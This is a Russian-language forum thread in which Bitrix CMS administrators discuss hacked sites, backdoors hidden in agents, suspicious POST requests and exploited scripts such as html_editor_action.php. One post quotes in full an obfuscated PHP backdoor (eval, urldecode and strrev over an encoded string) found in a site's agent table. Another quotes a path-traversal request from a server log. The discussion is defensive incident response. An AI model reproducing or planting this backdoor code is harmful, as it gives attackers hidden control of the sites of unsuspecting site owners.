Алексей Вдовин (Все сообщения пользователя)

Какие люди в наш топик пожаловали
Евгений Жуков,  welcome !

Коллеги, для контроля целостности используйте штатный механизм
Контроль целостности файлов
/bitrix/admin/security_file_verifier.php

Алексей Шибинский,  значит процесс в памяти сидит

мдда, уж - непонятно как такое может из агента запуститься

Скрытый текст

$arAgent["NAME"];//_(9.)H'5t}>qo7ouj7<(>!)U}3/]6u8u}Q%' //>w7u5ST<"IA.xY:8eeval /*9!._IkZ)1 DcpyxJA\"F/C1ra/9+E/&^15>Z"yd3y)vk$p6FN*/(/*]~P@.iKSyR3+hRfkLK~GUv3ZgJ!6dmtClEc{/*/urldecode#Dcc5L6|8cI8+~/?Y(/*I$s6IW3YhccLGyx^v2BAJN@ZnzRYVa+*/strrev/*8/WKh@/MlVGf6?yY`E)" w}SRU5]V{]n+5:tVJCC"j+8+%rlK{n*/(/* GC5%z1bi=x%3OOVsQB~jM%]:PZ*|Ox|v<3|8D`"bY(u*/'b3%56%57%27%47%02%e6%27%57%47%56%27%02%02%02%02%02%02%02%02%a0%d7%02%02%02%02%a0%b3%92%27%42%82%c6%16%67%56%02%02%02%02%a0%56%37%c6%56%02%02%02%02%a0%d7%02%02%02%02%a0%b3%27%42%02%d3%02%47%c6%57%37%56%27%f5%c6%16%67%56%42%02%02%02%02%a0%b3%92%22%13%02%d3%02%44%94%02%54%25%54%84%75%02%72%e4%72%02%d3%02%44%f4%94%25%54%05%f5%35%94%02%c2%03%63%02%d3%02%c4%14%65%25%54%45%e4%94%f5%45%e4%54%74%14%02%45%54%35%02%47%e6%56%76%16%f5%26%02%54%45%14%44%05%55%22%82%97%27%56%57%15%e3%d2%24%44%42%02%02%02%02%a0%b7%92%92%d5%22%87%87%87%56%27%f6%47%37%56%27%22%b5%45%35%54%55%15%54%25%f5%42%82%47%56%37%37%96%82%66%96%02%02%02%02%a0%b3%72%b3%92%82%16%47%16%44%47%96%d6%26%57%37%a3%a3%56%c6%26%16%45%16%47%16%44%27%56%47%e6%57%f6%34%c5%c5%37%36%96%47%97%c6%16%e6%14%c5%c5%e6%96%16%d4%c5%c5%87%96%27%47%96%24%c5%c5%72%02%d3%02%27%42%02%02%02%02%a0%b7%56%37%c6%56%02%02%02%02%a0%d7%02%02%02%02%a0%d7%02%02%02%02%a0%b3%47%96%87%56%02%02%02%02%a0%b7%92%56%42%02%e6%f6%96%47%07%56%36%87%54%82%02%86%36%47%16%36%02%02%02%02%a0%d7%02%02%02%02%a0%b3%92%92%92%d5%22%87%87%87%96%27%47%96%26%22%b5%45%35%54%55%15%54%25%f5%42%82%56%46%f6%36%56%46%c6%27%57%82%56%46%f6%36%56%46%c6%27%57%82%c6%16%67%56%02%d3%02%56%42%02%02%02%02%a0%b7%97%27%47%02%02%02%02%a0%a0%b3%92%22%13%02%d3%02%44%94%02%54%25%54%84%75%02%72%e4%72%02%d3%02%74%e4%94%e4%e4%55%25%02%c2%03%02%d3%02%45%e4%55%f4%34%f5%95%25%45%54%25%02%c2%c4%c4%55%e4%02%d3%02%b4%34%54%84%34%f5%54%45%14%44%02%45%54%35%02%47%e6%56%76%16%f5%26%02%54%45%14%44%05%55%22%82%97%27%56%57%15%e3%d2%24%44%42%02%02%02%02%a0%b7%92%92%d5%22%87%87%87%96%27%47%96%26%22%b5%45%35%54%55%15%54%25%f5%42%82%47%56%37%37%96%82%66%96%02%02%02%02%a0%02%02%02%02%02%02%02%02%a0%'/*}+o|u>#TYS0cP_\NWyaT2'55io>_yv*/) #T/N82kY'xApsEIx`?}`2_DB3;dm) /*pqPWM{~IE(WOT)l=?x[>zBI# yCBI#B:usrCorl6zEeOOSmoMJ.*/)/*LlRo0|sR8iF+.7}{MxB4Iqg8a5bp^OJ+=|z*/;/*"3YH?h_>d.8'Cay+z\A]M!.x,Lu({qx}&SFE<'c!6|)Y^*/

и ко мне тоже пациент пришел

ну это к создателям решения, по идее обновление не должно что-то ухудшить
сделайте полный бэкап и проверьте

ну если интересно что тут происходит можно
загнать в $_POST["BX_STAT"] содержимое post запроса, разделить функции на поэтапный вызов и дебаггером посмотреть
заодно по стеку вызовов глянуть как он подключается

если не интересно грохаем файлик и следим дальше

ну и первое, что нужно было сделать - конечно  обновить лицензию и ядро

тут новенький почему то не может в тему написать, кинул в личку - репост ниже
лично я таких POST ещё не встречал, думаю просто совпадение


я бы для начала так же как в предыдущем случае попробовал изучить запрос более детально
сохранил бы $_GET  $_POST параметры   (я так понимаю в лог полностью $_GET не влез, а было бы интересно взглянуть)

т.е. в /products/index.php в самое начало и mail() для оповещения перед die()

Александр, теперь поиском по всем php файлам ищите bitixxx

И в агентах ещё обязательно проверьте заразу

На хостинге был ещё хоть один не обновленный сайт?
Или один сайт - один хостинг?

я так понимаю только не обновлённые, хотя было одно сообщение


но так и без ответа про уязвимость ...

Лично на моей практике попадались взломанные сайты только не обновлённые


похоже на причину новой "волны", на сколько я помню год назад тоже была волна взломанных сайтов и не только под Битрикс.

чего то сообщение задвоилось, глюк какой то

clone message deleted

dmitry920, Вы бы лучше на этой главной содержимое $_POST запроса куда нить в файлик сохранили и сюда запостили, тогда можно найти адресата - скорее всего в ядре где-то спрятался.
В Вашем случае злоумышленнику достаточно этот $_POST запрос на любую другую страницу направить и вуаля.
в самое начало index.php разместите (блокировку уберите, она тут есть)


перед die() можно ещё добавить mail('mail@to', 'hack attempt', 'hack attempt'); чтобы попытки POST запросов на мыло фиксировать, после чего в ./logs/ заглянуть и сюда содержимое файлика закинуть

Смотрите логи, чистите бэкдоры.
В агентах обязательно проверьте.

нет такого

а вот это первый раз встречаю
"POST /bitrix/tools/mail_entry.php/. ./. ./. ./bitrix/tools/html_editor_action.php HTTP/1.1"

думаю всё тот же html_editor_action.php

тут я вижу попытки залезть через
html_editor_action.php и модуль vote
все они пофикшены в актульных обновлениях...

у вас все актуальные обновления были установлены?

странно, что на vote ответ 200 - вроде ж его нет у Вас?

если в итоге в агентах нечисть, то это скорее всего уязвимость html_editor_action.php
в vote там попроще ломают, там агента делать необходимости нет

Иван Петров, Это уже "вторичка".
Надо искать пост который этот файл создал.

а что за запросы? куда долбят?

когда .htaccess похерели на сайте клиента, я несколько тысяч инфицированных .htaccess поиском нашел
пришлось с бэкапа восстановиться

правда я только файловую структуру восстанавливал - БД не трогал (в этом случае обязательно проверить наличие вирусни в агентах)

что-то новенькое!
а как залезают то?

тут самое интересное (и конечно самое трудоёмкое) - анализ логов и выявление дыры

а вот это уже совсем неприятно  ...
в саппорт Битры не обращались?

такой злобной "дичи" как у Вас я не встречал ещё - как найдёте дырку, не поленитесь - отпишите плиз